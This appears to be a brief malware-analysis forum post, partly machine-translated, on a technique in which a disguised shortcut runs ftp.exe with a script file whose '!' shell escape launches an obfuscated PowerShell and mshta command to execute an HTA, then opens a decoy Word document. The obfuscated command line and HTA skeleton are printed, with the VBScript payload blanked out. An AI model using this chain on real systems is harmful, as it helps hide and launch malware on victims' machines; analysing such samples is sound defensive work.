Not too novel technology, you can not be surprised.
Look to see snow in the forum using FTP execute malicious code samples of the virus. ftp -s:filename指定包含FTP命令的文本文件
, Use !
number is the escape to shell.
Camouflage shortcut command execution
Sample camouflage document calls ftp.exe shortcut command execution. The malicious code is called implicit in the written document, beginning with ftp perform built-in !
to the shell to execute powershell.exe mshta.exe ccc.dat
this command, run by powershell.exe mshta.exe performed ccc.dat inside vbscript script. Then release the document to a normal drc.docx from ccc.dat in C: \ ProgramData \ drc.docx and open.
ftp -s:ccc.dat
ccc.dat
! %ProgramData:~3,1%%ProgramData:~5,1%wer%windir:~-1,1%hell.exe m%windir:~-1,1%hta.exe '%cd%\ccc.dat'
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script type="text/vbscript">
XXXXX
</script>
</head>
<body>
</body>
</html>